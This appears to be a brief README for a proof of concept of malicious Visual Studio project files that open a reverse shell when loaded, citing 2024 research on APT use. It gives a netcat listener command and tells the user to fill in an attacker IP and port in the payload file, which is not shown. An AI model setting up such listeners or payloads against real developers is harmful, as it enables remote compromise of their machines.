In March, 2024 a new method of popping shell that our friendly APT Groups use was discovered by our vigilant fellow cyber security researchers. You can read more about them here:
- https://www.linkedin.com/posts/neuways_malicious-visual-studio-projects-on-github-activity-7185996967150284800-JBhl
- https://blog.network-sec.de/post/persistence_weaponizing_csproj/
- https://github.com/cjm00n/EvilSln
Start a listener using nc:
$ nc -nlvp <LISTENER_PORT>Replace <ATTACKER_IP> & <LISTENER_PORT> in this file